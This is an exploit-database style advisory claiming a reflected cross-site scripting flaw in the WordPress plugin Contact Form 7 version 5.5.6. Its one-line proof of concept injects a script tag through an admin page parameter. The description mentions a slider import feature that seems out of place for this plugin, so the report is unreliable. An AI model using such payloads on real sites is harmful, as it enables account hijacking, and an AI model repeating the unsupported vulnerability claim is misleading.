<pre><code># Exploit Title: WordPress Plugin Contact Form 7 v5.5.6 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/contact-form-7<br /># Version: 5.5.6<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a Contact Form 7 from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/contact-form-7/admin/admin.php?page=<script>alert("test")</script><br /></code></pre>